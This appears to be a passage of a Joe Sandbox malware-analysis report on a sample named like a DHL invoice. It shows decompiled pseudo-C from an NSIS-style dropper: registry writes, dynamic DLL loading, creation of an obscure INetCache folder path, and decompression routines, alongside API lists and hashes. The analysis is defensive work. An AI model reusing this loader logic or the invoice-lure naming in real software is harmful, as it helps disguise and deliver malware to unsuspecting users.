                                        							E73EF24D8(_t54);
                                        							_t37 = GlobalFree(E73EF1266(E73EF1559(_t54)));
                                        						}
                                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                        							_t37 = E73EF249E(_t54);
                                        							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                        								_t37 =  *(_t54 + 0x808);
                                        								if(_t37 != 0) {
                                        									_t37 = FreeLibrary(_t37);
                                        								}
                                        							}
                                        							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                        								_t37 = E73EF14E2( *0x73ef4058);
                                        							}
                                        						}
                                        						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                        							goto L28;
                                        						} else {
                                        							return GlobalFree(_t54);
                                        						}
                                        					}
                                        					_t48 =  *_t54;
                                        					if(_t48 == 0) {
                                        						if(_t57 != 1) {
                                        							goto L14;
                                        						}
                                        						E73EF2CC3(_t54);
                                        						L12:
                                        						_t54 = _t48;
                                        						L13:
                                        						goto L14;
                                        					}
                                        					_t49 = _t48 - 1;
                                        					if(_t49 == 0) {
                                        						L8:
                                        						_t48 = E73EF2A38(_t57, _t54); // executed
                                        						goto L12;
                                        					}
                                        					_t50 = _t49 - 1;
                                        					if(_t50 == 0) {
                                        						E73EF26B2(_t54);
                                        						goto L13;
                                        					}
                                        					if(_t50 != 1) {
                                        						goto L14;
                                        					}
                                        					goto L8;
                                        				}
                                        			}


















                                        0x73ef16db
                                        0x73ef16db
                                        0x73ef16db
                                        0x73ef16e5
                                        0x73ef16ed
                                        0x73ef16fa
                                        0x73ef1708
                                        0x73ef170b
                                        0x73ef170d
                                        0x73ef1712
                                        0x73ef1717
                                        0x73ef1836
                                        0x73ef1836
                                        0x73ef171d
                                        0x73ef1721
                                        0x73ef1724
                                        0x73ef1729
                                        0x73ef172b
                                        0x73ef1731
                                        0x73ef1737
                                        0x73ef1767
                                        0x73ef176e
                                        0x73ef1792
                                        0x73ef17dd
                                        0x73ef1794
                                        0x73ef1794
                                        0x73ef1795
                                        0x73ef179b
                                        0x73ef179c
                                        0x73ef17a6
                                        0x73ef17a9
                                        0x73ef17ae
                                        0x73ef17b5
                                        0x73ef17b5
                                        0x73ef17bc
                                        0x73ef17c2
                                        0x73ef17c8
                                        0x73ef17d5
                                        0x73ef17d6
                                        0x73ef17d9
                                        0x73ef1770
                                        0x73ef1771
                                        0x73ef1786
                                        0x73ef1786
                                        0x73ef17e7
                                        0x73ef17ea
                                        0x73ef17f7
                                        0x73ef17fe
                                        0x73ef1806
                                        0x73ef1809
                                        0x73ef1809
                                        0x73ef1806
                                        0x73ef1816
                                        0x73ef181e
                                        0x73ef1823
                                        0x73ef1816
                                        0x73ef182b
                                        0x00000000
                                        0x73ef182d
                                        0x00000000
                                        0x73ef182e
                                        0x73ef182b
                                        0x73ef173b
                                        0x73ef173e
                                        0x73ef175c
                                        0x00000000
                                        0x00000000
                                        0x73ef175f
                                        0x73ef1764
                                        0x73ef1764
                                        0x73ef1766
                                        0x00000000
                                        0x73ef1766
                                        0x73ef1740
                                        0x73ef1741
                                        0x73ef1749
                                        0x73ef174a
                                        0x00000000
                                        0x73ef174a
                                        0x73ef1743
                                        0x73ef1744
                                        0x73ef1752
                                        0x00000000
                                        0x73ef1752
                                        0x73ef1747
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1747

                                        APIs
                                          • Part of subcall function 73EF1A98: GlobalFree.KERNEL32 ref: 73EF1D09
                                          • Part of subcall function 73EF1A98: GlobalFree.KERNEL32 ref: 73EF1D0E
                                          • Part of subcall function 73EF1A98: GlobalFree.KERNEL32 ref: 73EF1D13
                                        • GlobalFree.KERNEL32 ref: 73EF1786
                                        • FreeLibrary.KERNEL32(?), ref: 73EF1809
                                        • GlobalFree.KERNEL32 ref: 73EF182E
                                          • Part of subcall function 73EF22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 73EF22E0
                                          • Part of subcall function 73EF26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73EF1757,00000000), ref: 73EF2782
                                          • Part of subcall function 73EF156B: wsprintfA.USER32 ref: 73EF1599
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: 440ef1ffe22409584c1c89ce42ed031188c308304a16708961dd35e6f64223f6
                                        • Instruction ID: fa51bb6739526e9c4ea3bf07362f38c1ea422867a6374c3c95d950d7481b7e42
                                        • Opcode Fuzzy Hash: 440ef1ffe22409584c1c89ce42ed031188c308304a16708961dd35e6f64223f6
                                        • Instruction Fuzzy Hash: 16419E7610134F9BDB81AF648984B9E37BCFF46218F188469E90F9A1C6DBF4C045CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 783 40243d-40246e call 402b2c * 2 call 402bbc 790 402474-40247e 783->790 791 4029b8-4029c7 783->791 793 402480-40248d call 402b2c lstrlenA 790->793 794 40248e-402491 790->794 793->794 795 402493-4024a4 call 402b0a 794->795 796 4024a5-4024a8 794->796 795->796 800 4024b9-4024cd RegSetValueExA 796->800 801 4024aa-4024b4 call 402ffb 796->801 805 4024d2-4025af RegCloseKey 800->805 806 4024cf 800->806 801->800 805->791 806->805
                                        C-Code - Quality: 83%
                                        			E0040243D(void* __eax, int __ebx, intOrPtr __edx) {
                                        				void* _t18;
                                        				void* _t19;
                                        				int _t22;
                                        				long _t23;
                                        				int _t28;
                                        				intOrPtr _t31;
                                        				void* _t32;
                                        				intOrPtr _t35;
                                        				void* _t37;
                                        				void* _t40;
                                        
                                        				_t31 = __edx;
                                        				_t28 = __ebx;
                                        				_t35 =  *((intOrPtr*)(_t37 - 0x24));
                                        				_t32 = __eax;
                                        				 *(_t37 - 0x10) =  *(_t37 - 0x20);
                                        				 *(_t37 - 0x4c) = E00402B2C(2);
                                        				_t18 = E00402B2C(0x11);
                                        				 *(_t37 - 4) = 1;
                                        				_t19 = E00402BBC(_t40, _t32, _t18, 2); // executed
                                        				 *(_t37 + 8) = _t19;
                                        				if(_t19 != __ebx) {
                                        					_t22 = 0;
                                        					if(_t35 == 1) {
                                        						E00402B2C(0x23);
                                        						_t22 = lstrlenA(0x409be8) + 1;
                                        					}
                                        					if(_t35 == 4) {
                                        						 *0x409be8 = E00402B0A(3);
                                        						 *((intOrPtr*)(_t37 - 0x44)) = _t31;
                                        						_t22 = _t35;
                                        					}
                                        					if(_t35 == 3) {
                                        						_t22 = E00402FFB( *((intOrPtr*)(_t37 - 0x28)), _t28, 0x409be8, 0xc00); // executed
                                        					}
                                        					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x4c), _t28,  *(_t37 - 0x10), 0x409be8, _t22); // executed
                                        					if(_t23 == 0) {
                                        						 *(_t37 - 4) = _t28;
                                        					}
                                        					_push( *(_t37 + 8));
                                        					RegCloseKey();
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *(_t37 - 4);
                                        				return 0;
                                        			}













                                        0x0040243d
                                        0x0040243d
                                        0x0040243d
                                        0x00402440
                                        0x00402447
                                        0x00402451
                                        0x00402454
                                        0x0040245d
                                        0x00402464
                                        0x0040246b
                                        0x0040246e
                                        0x00402474
                                        0x0040247e
                                        0x00402482
                                        0x0040248d
                                        0x0040248d
                                        0x00402491
                                        0x0040249b
                                        0x004024a1
                                        0x004024a4
                                        0x004024a4
                                        0x004024a8
                                        0x004024b4
                                        0x004024b4
                                        0x004024c5
                                        0x004024cd
                                        0x004024cf
                                        0x004024cf
                                        0x004024d2
                                        0x004025a9
                                        0x004025a9
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000023,00000011,00000002), ref: 00402488
                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,00000011,00000002), ref: 004024C5
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,00000011,00000002), ref: 004025A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsf4536.tmp
                                        • API String ID: 2655323295-3147736861
                                        • Opcode ID: edd33fe483ba84759b99ae37b3b6bbb98728847c3150981f6fed721a845609ff
                                        • Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
                                        • Opcode Fuzzy Hash: edd33fe483ba84759b99ae37b3b6bbb98728847c3150981f6fed721a845609ff
                                        • Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E0040206A(void* __ebx, void* __eflags) {
                                        				struct HINSTANCE__* _t18;
                                        				struct HINSTANCE__* _t26;
                                        				void* _t27;
                                        				struct HINSTANCE__* _t30;
                                        				CHAR* _t32;
                                        				intOrPtr* _t33;
                                        				void* _t34;
                                        
                                        				_t27 = __ebx;
                                        				asm("sbb eax, 0x4237d8");
                                        				 *(_t34 - 4) = 1;
                                        				if(__eflags < 0) {
                                        					_push(0xffffffe7);
                                        					L15:
                                        					E00401423();
                                        					L16:
                                        					 *0x4237a8 =  *0x4237a8 +  *(_t34 - 4);
                                        					return 0;
                                        				}
                                        				_t32 = E00402B2C(0xfffffff0);
                                        				 *(_t34 + 8) = E00402B2C(1);
                                        				if( *((intOrPtr*)(_t34 - 0x24)) == __ebx) {
                                        					L3:
                                        					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                        					_t30 = _t18;
                                        					if(_t30 == _t27) {
                                        						_push(0xfffffff6);
                                        						goto L15;
                                        					}
                                        					L4:
                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                        					if(_t33 == _t27) {
                                        						E00405101(0xfffffff7,  *(_t34 + 8));
                                        					} else {
                                        						 *(_t34 - 4) = _t27;
                                        						if( *((intOrPtr*)(_t34 - 0x2c)) == _t27) {
                                        							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x424000, 0x40a828, 0x409000); // executed
                                        						} else {
                                        							E00401423( *((intOrPtr*)(_t34 - 0x2c)));
                                        							if( *_t33() != 0) {
                                        								 *(_t34 - 4) = 1;
                                        							}
                                        						}
                                        					}
                                        					if( *((intOrPtr*)(_t34 - 0x28)) == _t27 && E00403797(_t30) != 0) {
                                        						FreeLibrary(_t30);
                                        					}
                                        					goto L16;
                                        				}
                                        				_t26 = GetModuleHandleA(_t32); // executed
                                        				_t30 = _t26;
                                        				if(_t30 != __ebx) {
                                        					goto L4;
                                        				}
                                        				goto L3;
                                        			}










                                        0x0040206a
                                        0x0040206a
                                        0x0040206f
                                        0x00402076
                                        0x00402131
                                        0x004022a4
                                        0x004022a4
                                        0x004029b8
                                        0x004029bb
                                        0x004029c7
                                        0x004029c7
                                        0x00402085
                                        0x0040208f
                                        0x00402092
                                        0x004020a1
                                        0x004020a5
                                        0x004020ab
                                        0x004020af
                                        0x0040212a
                                        0x00000000
                                        0x0040212a
                                        0x004020b1
                                        0x004020ba
                                        0x004020be
                                        0x00402102
                                        0x004020c0
                                        0x004020c3
                                        0x004020c6
                                        0x004020f6
                                        0x004020c8
                                        0x004020cb
                                        0x004020d4
                                        0x004020d6
                                        0x004020d6
                                        0x004020d4
                                        0x004020c6
                                        0x0040210a
                                        0x0040211f
                                        0x0040211f
                                        0x00000000
                                        0x0040210a
                                        0x00402095
                                        0x0040209b
                                        0x0040209f
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095
                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll), ref: 0040516F
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
                                          • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 9df56e7d61f173b7ce09018b28e1b31a2cbc0ab7774ce8c4a93682e38e80f95d
                                        • Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
                                        • Opcode Fuzzy Hash: 9df56e7d61f173b7ce09018b28e1b31a2cbc0ab7774ce8c4a93682e38e80f95d
                                        • Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E004015BB(char __ebx, void* __eflags) {
                                        				void* _t13;
                                        				int _t19;
                                        				char _t21;
                                        				void* _t22;
                                        				char _t23;
                                        				signed char _t24;
                                        				char _t26;
                                        				CHAR* _t28;
                                        				char* _t32;
                                        				void* _t33;
                                        
                                        				_t26 = __ebx;
                                        				_t28 = E00402B2C(0xfffffff0);
                                        				_t13 = E00405A0B(_t28);
                                        				_t30 = _t13;
                                        				if(_t13 != __ebx) {
                                        					do {
                                        						_t32 = E0040599D(_t30, 0x5c);
                                        						_t21 =  *_t32;
                                        						 *_t32 = _t26;
                                        						 *((char*)(_t33 + 0xb)) = _t21;
                                        						if(_t21 != _t26) {
                                        							L5:
                                        							_t22 = E00405644(_t28);
                                        						} else {
                                        							_t39 =  *((intOrPtr*)(_t33 - 0x2c)) - _t26;
                                        							if( *((intOrPtr*)(_t33 - 0x2c)) == _t26 || E00405661(_t39) == 0) {
                                        								goto L5;
                                        							} else {
                                        								_t22 = E004055C7(_t28); // executed
                                        							}
                                        						}
                                        						if(_t22 != _t26) {
                                        							if(_t22 != 0xb7) {
                                        								L9:
                                        								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                        							} else {
                                        								_t24 = GetFileAttributesA(_t28); // executed
                                        								if((_t24 & 0x00000010) == 0) {
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                        						 *_t32 = _t23;
                                        						_t30 = _t32 + 1;
                                        					} while (_t23 != _t26);
                                        				}
                                        				if( *((intOrPtr*)(_t33 - 0x30)) == _t26) {
                                        					_push(0xfffffff5);
                                        					E00401423();
                                        				} else {
                                        					E00401423(0xffffffe6);
                                        					E00405FDA("C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto\\Styringsmidlernes\\Pinkfishes109\\Supersensitizations172\\Smaskforvirrede", _t28);
                                        					_t19 = SetCurrentDirectoryA(_t28); // executed
                                        					if(_t19 == 0) {
                                        						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                        					}
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t33 - 4));
                                        				return 0;
                                        			}













                                        0x004015bb
                                        0x004015c2
                                        0x004015c5
                                        0x004015ca
                                        0x004015ce
                                        0x004015d0
                                        0x004015d8
                                        0x004015da
                                        0x004015dc
                                        0x004015e0
                                        0x004015e3
                                        0x004015fb
                                        0x004015fc
                                        0x004015e5
                                        0x004015e5
                                        0x004015e8
                                        0x00000000
                                        0x004015f3
                                        0x004015f4
                                        0x004015f4
                                        0x004015e8
                                        0x00401603
                                        0x0040160a
                                        0x00401617
                                        0x00401617
                                        0x0040160c
                                        0x0040160d
                                        0x00401615
                                        0x00000000
                                        0x00000000
                                        0x00401615
                                        0x0040160a
                                        0x0040161a
                                        0x0040161d
                                        0x0040161f
                                        0x00401620
                                        0x004015d0
                                        0x00401627
                                        0x00401652
                                        0x004022a4
                                        0x00401629
                                        0x0040162b
                                        0x00401636
                                        0x0040163c
                                        0x00401644
                                        0x0040164a
                                        0x0040164a
                                        0x00401644
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                          • Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede,00000000,00000000,000000F0), ref: 0040163C
                                        Strings
                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede, xrefs: 00401631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede
                                        • API String ID: 1892508949-3537119737
                                        • Opcode ID: 5cfa9deb3d8257745ad8f4e180157ca1595cadb6213feee14bfc4c3bdc9c1bf4
                                        • Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
                                        • Opcode Fuzzy Hash: 5cfa9deb3d8257745ad8f4e180157ca1595cadb6213feee14bfc4c3bdc9c1bf4
                                        • Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E00405EC1(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                        				int _v8;
                                        				long _t21;
                                        				long _t24;
                                        				char* _t30;
                                        
                                        				asm("sbb eax, eax");
                                        				_v8 = 0x400;
                                        				_t21 = E00405E60(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                        				_t30 = _a16;
                                        				if(_t21 != 0) {
                                        					L4:
                                        					 *_t30 =  *_t30 & 0x00000000;
                                        				} else {
                                        					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                        					_t21 = RegCloseKey(_a20); // executed
                                        					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                        						goto L4;
                                        					}
                                        				}
                                        				return _t21;
                                        			}







                                        0x00405ecf
                                        0x00405ed1
                                        0x00405ee9
                                        0x00405eee
                                        0x00405ef3
                                        0x00405f30
                                        0x00405f30
                                        0x00405ef5
                                        0x00405f07
                                        0x00405f12
                                        0x00405f18
                                        0x00405f22
                                        0x00000000
                                        0x00000000
                                        0x00405f22
                                        0x00405f35

                                        APIs
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406105,80000002), ref: 00405F07
                                        • RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll), ref: 00405F12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Call
                                        • API String ID: 3356406503-1824292864
                                        • Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                        • Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
                                        • Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                        • Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 99%
                                        			E00406A9B() {
                                        				signed int _t530;
                                        				void _t537;
                                        				signed int _t538;
                                        				signed int _t539;
                                        				unsigned short _t569;
                                        				signed int _t579;
                                        				signed int _t607;
                                        				void* _t627;
                                        				signed int _t628;
                                        				signed int _t635;
                                        				signed int* _t643;
                                        				void* _t644;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					_t530 =  *(_t644 - 0x30);
                                        					if(_t530 >= 4) {
                                        					}
                                        					 *(_t644 - 0x40) = 6;
                                        					 *(_t644 - 0x7c) = 0x19;
                                        					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                        					while(1) {
                                        						L145:
                                        						 *(_t644 - 0x50) = 1;
                                        						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                        						while(1) {
                                        							L149:
                                        							if( *(_t644 - 0x48) <= 0) {
                                        								goto L155;
                                        							}
                                        							L150:
                                        							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                        							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                        							 *(_t644 - 0x54) = _t643;
                                        							_t569 =  *_t643;
                                        							_t635 = _t569 & 0x0000ffff;
                                        							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                        							if( *(_t644 - 0xc) >= _t607) {
                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                        								_t628 = _t627 + 1;
                                        								 *_t643 = _t569 - (_t569 >> 5);
                                        								 *(_t644 - 0x50) = _t628;
                                        							} else {
                                        								 *(_t644 - 0x10) = _t607;
                                        								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                        								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                        							}
                                        							if( *(_t644 - 0x10) >= 0x1000000) {
                                        								L148:
                                        								_t487 = _t644 - 0x48;
                                        								 *_t487 =  *(_t644 - 0x48) - 1;
                                        								L149:
                                        								if( *(_t644 - 0x48) <= 0) {
                                        									goto L155;
                                        								}
                                        								goto L150;
                                        							} else {
                                        								L154:
